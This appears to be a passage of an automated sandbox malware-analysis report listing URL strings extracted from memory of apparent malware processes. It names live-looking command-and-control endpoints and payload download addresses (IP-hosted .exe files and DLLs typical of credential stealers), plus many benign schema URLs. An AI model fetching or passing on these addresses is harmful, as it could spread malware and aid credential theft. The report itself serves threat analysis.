Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpFa
Source: Hkbsse.exe, 00000013.00000002.3791168067.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpI
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpIN
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpMEOW
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpWSER_USER_PROFILE_STRI
Source: Hkbsse.exe, 00000013.00000002.3791168067.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpa
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcoded
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpeskLOCALAPPDATA=C:
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpff913c5fc0b879a0d56e06
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpkx
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpn
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpp
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phppa
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phprs
Source: Hkbsse.exe, 00000013.00000002.3791168067.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpu
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/NewLatest.exeF
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/NewLatest.exeK
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/erences.SourceAumid
Source: Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/oreCommonProxyStub.dll
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://43.153.49.49:8888/down/O3B6wY7ZkFhh.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://43.153.49.49:8888/down/TpWWMUpe0LEV.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://43.153.49.49:8888/down/TpWWMUpe0LEV.exek
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.00000000004A6000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2124198557.0000000000448000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.php
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.php%C
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpWC
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpZC
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpelegram
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpfBC
Source: aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpnC
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.00000000004A6000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phposition:
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phppera
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/108e010e8f91c38c.phpthereum
Source: aspnet_regiis.exe, 00000036.00000002.2142722347.00000000232DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/freebl3.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/mozglue.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/msvcp140.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/msvcp140.dll&f
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/msvcp140.dllEM
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/msvcp140.dllJf8
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllNT
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllal
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllammBG
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllllQF
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllosoFF
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dllpDamF
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/nss3.dlltdedG
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/softokn3.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/softokn3.dllllnf
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/softokn3.dllxfJ
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/sqlite3.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/vcruntime140.dll
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.0/b13597c85f807692/vcruntime140.dllka
Source: aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://65.21.175.06
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php0112001
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php1
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php1o
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006050000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.php2
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpAlQ
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpBoP
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006050000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpF
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpcls
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpdor
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001153000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpiP
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptch
Source: axplong.exe, 0000000A.00000002.3800589612.0000000006030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptlb
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/123.exeY5
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/123.exed4
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/alex5555555.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001137000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/gold.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001137000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/lend/gold.exee
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.91.77.81/soka/random.exe
Source: axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.228.166.74/wp-includes/ldr.exe
Source: svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215488343.000001496F58A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000011.00000002.3795315046.000001496FA53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 00000011.00000002.3795489773.000001496FA8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tbpose
Source: svchost.exe, 00000011.00000002.3795065695.000001496FA13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000006.00000002.3154903535.00000200BEC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791446115.000001496ECA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000011.00000002.3791446115.000001496ECA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org
Source: svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-http://Passport.NET/STS09/xmldsig#ripledes-c
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1940927772.000001496F581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1844385189.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2234224654.000001496F556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1705292405.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000011.00000003.1941121224.000001496F50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794505898.000001496F510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2235121840.000001496F50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941054724.000001496F507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2235088863.000001496F507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1844385189.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1844385189.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsenfo
Source: svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1940927772.000001496F581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941054724.000001496F507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1844385189.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1835684843.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1705292405.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000011.00000003.1941121224.000001496F50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794505898.000001496F510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2235121840.000001496F50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941054724.000001496F507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2235088863.000001496F507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsenfo
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: svchost.exe, 00000011.00000002.3793881542.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
